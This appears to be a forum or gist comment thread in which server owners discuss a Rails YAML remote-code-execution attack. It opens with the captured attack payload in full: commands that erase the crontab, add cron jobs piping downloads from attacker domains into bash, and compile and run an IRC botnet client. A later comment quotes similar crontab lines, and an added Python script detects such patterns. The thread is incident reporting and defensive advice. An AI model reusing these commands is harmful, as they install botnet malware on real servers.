crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k |
The Gem::Requirements piece makes me think it's the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck
If your server has been compromised, you must rebuild from scratch - updating versions isn't enough.
It looks like it's part of a botnet, as it's using IRC.
@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is Hash::DisallowedType: Disallowed type attribute: "yaml".
You can test for vulnerable versions in applications automatically with GemCanary, which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your Gemfile.lock.
Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference.
All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks!
Hi,
and what about my configuration?
Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]
no nginx, no Rails 3.2.1, no Redmine, no YAML problem, but I had the same problem detailed below:
- k.c, k and ka files in /var/tmp (probably irc script)
- a new line in my crontab executing some wget like this:
wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka
wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -
wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k
I do not find any suspect trace in my Apache log, but there were some actions under fail2ban (I didn't look deeper into it since the chmod and updating the www-data cron resolved my problem as described above).
I'm still searching for how the malicious scripts were uploaded to my server ...
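As an added example (not part of this thread or anyone's posted code), a small Python check that scans a crontab dump for the persistence pattern described in the comments above: a download piped straight into a shell, and a payload fetched, compiled or chmod'ed inside a temp directory. The sample crontab and the example.invalid hosts are constructed.

```python
import re

# Indicators modelled on the entries discussed in this thread.
PIPE_TO_SHELL = re.compile(   # wget/curl output piped straight into sh or bash
    r'\b(wget\s+(?:-q\s+)?-O\s*-\s+[^\s|;]+|curl\s+[^|;]*)\s*\|\s*(ba)?sh\b')
TMP_DOWNLOAD = re.compile(    # wget writing its output into a temp directory
    r'\bwget\b[^;&|]*\s(/var/tmp|/tmp|/dev/shm)/\S+')
TMP_BUILD = re.compile(       # compile or chmod +x of a file in a temp directory
    r'\b(gcc\s+-o|chmod\s+\+x)\s+(/var/tmp|/tmp|/dev/shm)/')
CRON_LINE = re.compile(r'^\s*((?:\S+\s+){5})(.*)$')  # five schedule fields + command

# Constructed sample, not a real crontab; hosts are placeholders.
SAMPLE_CRONTAB = """\
# constructed sample crontab
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
1 * * * * wget -O - http://malicious.example.invalid/cmd1|bash;wget -O - http://malicious2.example.invalid/cmd2|bash
*/5 * * * * wget -O /var/tmp/k.c http://malicious.example.invalid/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka
"""

def parse_crontab(text):
    """Return (schedule, command) pairs, skipping comments and VAR=value lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or re.match(r'^\w+=', line):
            continue
        m = CRON_LINE.match(line)
        if m:
            entries.append((m.group(1).strip(), m.group(2).strip()))
    return entries

def classify(command):
    """Return the list of indicator names that fire on one cron command."""
    findings = []
    if PIPE_TO_SHELL.search(command):
        findings.append('download piped to shell')
    if TMP_DOWNLOAD.search(command):
        findings.append('payload written to temp dir')
    if TMP_BUILD.search(command):
        findings.append('compile/chmod in temp dir')
    return findings

def scan_crontab(text):
    """Return one report dict per suspicious entry; benign entries are omitted."""
    report = []
    for schedule, command in parse_crontab(text):
        findings = classify(command)
        if findings:
            report.append({'schedule': schedule, 'command': command, 'findings': findings})
    return report

if __name__ == '__main__':
    for hit in scan_crontab(SAMPLE_CRONTAB):
        print(hit['schedule'], '->', ', '.join(hit['findings']))
```

Run it against the output of `crontab -l -u www-data` (and the other service accounts) on a host you suspect; a clean system should produce no report entries.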
Hi,
my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?
my server was infected too, should I do a reinstall?
definitely
@Netmisa: I've since uninstalled phpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.
OK, anyway we know now where the problem comes from.
Sounds like this one
http://www.h-online.com/open/news/item/Attack-wave-on-Ruby-on-Rails-1872588.html
Please update your Rails installation:
http://charlie.bz/blog/rails-3.2.10-remote-code-execution